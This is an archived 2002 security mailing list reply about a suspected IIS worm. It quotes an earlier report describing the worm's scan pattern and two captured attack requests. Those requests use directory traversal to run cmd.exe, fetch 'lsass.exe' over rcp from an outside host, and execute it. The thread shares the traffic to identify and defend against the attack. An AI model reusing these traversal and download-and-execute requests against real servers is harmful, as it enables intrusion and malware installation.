Re: new IIS worm? (rcp lsass.exe)

From: Michael Thompson (mikeat_private)
Date: Sun Sep 22 2002 - 17:25:30 PDT

Next message: Mike Lewinski: "Re: new IIS worm? (rcp lsass.exe)"

Previous message: Björn Wallentinus: "Re: new IIS worm? (rcp lsass.exe)"
In reply to: Christian Mock: "new IIS worm? (rcp lsass.exe)"
Next in thread: Nick FitzGerald: "Re: new IIS worm? (rcp lsass.exe)"
Next in thread: Mike Lewinski: "Re: new IIS worm? (rcp lsass.exe)"
Reply: Nick FitzGerald: "Re: new IIS worm? (rcp lsass.exe)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello Christian,

On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my
TimeZone) you wrote:




CM> hi,

CM> since about a week I notice attempts to exploit vulnerable IIS installations
CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature)
CM> that seems to try and load an "lsass.exe" file via rcp.

CM> As a search of google and securityfocus turned up nothing, I'll throw in 
CM> what I gathered so far and ask if anybody can identify this: (it seems
CM> the affected customer's systems weren't vulnerable, so I don't know what
CM> the worm's further actions are).

CM> The first part is a SYN scan for port 80, with the source port set to 80, 
CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over
CM> the 3rd IP address octet first, and the 4th later, probably to make the scan
CM> on the single /24 slower and less noticeable (in the case I've seen, it
CM> has some 30 seconds between packets to consecutive addresses).

CM> Then it seems to go after the web servers, sending the following:

CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..

CM> and

CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0

CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but 
CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks.

CM> Yes, and the IP addresse doing the scanning + exploit attempts is different
CM> from the one which provides lsass.exe; the scanning machine seems to be
CM> a solaris 2.7 default install, the rcp-server seems to be solaris 2.8.

CM> regards,

CM> cm.


lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is
responsable for managing secure storage in those enviroments.

-- 
Best regards,
 Michael

http://wwww.thompsonmike.co.uk/
PGP KeyID := 0x3CC985FA
  

I just can't put it down. 



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Mike Lewinski: "Re: new IIS worm? (rcp lsass.exe)"
Previous message: Björn Wallentinus: "Re: new IIS worm? (rcp lsass.exe)"
In reply to: Christian Mock: "new IIS worm? (rcp lsass.exe)"
Next in thread: Nick FitzGerald: "Re: new IIS worm? (rcp lsass.exe)"
Next in thread: Mike Lewinski: "Re: new IIS worm? (rcp lsass.exe)"
Reply: Nick FitzGerald: "Re: new IIS worm? (rcp lsass.exe)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:03:57 PDT